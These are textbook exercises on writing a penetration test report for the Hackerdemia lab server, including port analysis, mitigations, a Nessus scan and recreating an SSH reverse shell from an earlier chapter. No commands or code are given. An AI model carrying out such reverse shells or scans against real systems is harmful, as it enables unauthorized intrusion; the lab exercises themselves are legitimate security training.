Expand Your Skills

Want to know more about reporting results? The following exercises are intended to provide you with additional knowledge and skills, so you can understand this topic better. Use your lab to conduct the following exercises.

EXERCISE 15.1

Create a Simple Penetration Test Report

1. Search the Internet for ideas on what a professional penetration test report should look like. Provide the uniform resource locator (URL) of at least two examples.

2. Create a reporting template, using either Microsoft Word or OpenOffice. The template should include a title page, an executive summary page, a main body of text, a conclusion, appendix A, appendix B, and a reference page. Personalize the report to your own satisfaction; do not use the examples found in step 1.

3. Using the architecture illustrated in Chapter 13, in Figure 13.10, describe the architecture. Include all identified communication ports available on the Hackerdemia server and host firewall configurations (seen in Figure 13.12). Omit the netcat listeners from the description. Add the architecture description to the main body of text in your report.

4. Provide a high-level analysis of at least five different communication ports found on the Hackerdemia server. Provide a bulleted list of your findings and an additional bulleted list of ways to mitigate the five communication ports. Include at least two different mitigation options for each port.

5. Assume that a reverse netcat shell was installed on the Hackerdemia server, as illustrated in Figure 13.11, using social engineering. Create a scenario describing the exploit at a high level; the description should be at least two paragraphs. Add your finding to those listed in bullet format in step 4.

6. Provide at least three ways to mitigate the vulnerability detailed in step 5, and add them as a bulleted list to the main body of text, as described in step 4.

7. Write a conclusion, explaining the overall risk of the Hackerdemia server, based on your findings.

8. Recreate the Secure Shell (SSH) reverse shell, described in Chapter 13 and illustrated in Figure 13.6. Record all keystrokes using the script application, saving them to a file. Add the script output to appendix A of your report.

9. Create a list of acronyms used in your report. Add them to appendix B.

10. Find references on the Internet related to your findings from step 4 and step 5.

EXERCISE 15.2

Create Metrics

1. Based on the information gathered in Exercise 15.1, provide a decision tree analysis chart describing your mitigation suggestions.

2. Perform a Nessus scan against the Hackerdemia server. Create a sensitivity matrix, using at least five different findings. Use "time to mitigate" as the impact measurement.

EXERCISE 15.3

Submit Your Report for Peer Review

1. Go to http://forums.heorot.net and submit your report in the "Chapter 15" forum, located in the "Professional Penetration Testing Book" section.

2. Perform a peer review on a report already submitted and post your response as a reply. Be constructive in your comments.


URL:

https://www.sciencedirect.com/science/article/pii/B978159749425000021X